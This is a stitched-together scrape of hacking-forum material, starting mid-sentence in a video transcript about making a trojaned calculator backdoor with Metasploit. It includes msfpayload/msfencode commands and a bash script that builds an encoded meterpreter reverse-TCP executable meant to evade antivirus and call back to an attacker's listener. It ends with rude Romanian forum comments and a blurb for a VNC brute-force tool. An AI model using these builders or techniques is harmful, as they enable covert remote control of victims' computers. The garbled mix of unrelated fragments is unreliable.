the payload will only be executed. -e is the encoder to use you can use whatever you like, you can view all the encoders in the metasploit framework by typing 'show encoders'. Encoders are important in evading AVs but this is not perfect as we think, the best way is to write our custom encoders for better results.-i stand for iteration or our count, how many times we would encode. -f is the format we are going to use so in my case I will use exe as the format. So that's it from the creation of our backdoor. Now we will launch Metasploit and use exploit/multihandler. This is a stub that handles exploits launched outside our framework. As our backdoor listens to the specified settings we have to give the same payload, same local host and same port which we used at the creation of our backdoor. so that's it run exploit and msf will start listening. Okay now lets dump our created backdoor which works fine as a calculator , just like a clone of calculator. Once the victim runs our infected calc.exe we should get a nice meterpreter revserse connection . So that's it the box is pwned. We can create the same backdoor by piping msfencode into msfpayload which results a very long parameter and difficult to memorize the commands. msfpayload windows/meterpreter/reverse_tcp LHOST=[ your local ip ] LPORT=[ your local ip ] R | msfencode -e x86/shikata_ga_nai -c 10 -o calc_backdoor.exe -t exe -x calc.exe -k So by using MSFVenom easily we can generate payload along with encoding in a simple manner. I hope you learnt something useful. Thank you. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Making Backdoors With Msfvenom

This script will create an executable file which it will listen in 3 different ports and it will be encoded with the shikata_ga_nai encoder.Of course it can be used also to create different file extensions like .vba etc automatically.You can see the source code of the script below. #!/bin/bash # Simple builder LHOST="192.168.91.135" LPORTS="4444 5555 6666" rm -fr /tmp/msf.raw rm -fr /tmp/msf1.raw echo "Building…" echo -n "Port: `echo $LPORTS | cut -d " " -f 1`" echo "" msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=`echo $LPORTS | cut -d " " -f 1` exitfunc=thread > /tmp/msf.raw for LPORT in `echo $LPORTS` do echo -n "Port: $LPORT" echo "" msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf.raw > /tmp/msf1.raw cp /tmp/msf1.raw /tmp/msf.raw done # Change option –f exe to –f vba in order to create a vba file msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf1.raw > msf.exe rm -fr /tmp/msf.raw rm -fr /tmp/msf1.raw echo -n "Done!" Original Author: Michele

Alt link de download se poate? MULTUMESC! EDIT: \\ LUATI COPII: Free Email Software Downloads NU L-AM VERIFICAT!

Fa o bomba.Cu cacat.

" Mentionez ca script-ul nu imi apartine dar accept donatii :https://steamcommunity.com/tradeoffer/new/?partner=189467411&token=2VLN1Par " du-te-n mortii ma-tii, ce tupeu

Brutus remote computers on the VNC protocol (port 5900) The principle of operation as that of the RDP Brutus. We obtain Types (scan 5900 port). And then as in DUbrute generate only logins not, some passwords. Connecting to servers provide third-party programs, such as TightVNC. Have Fun !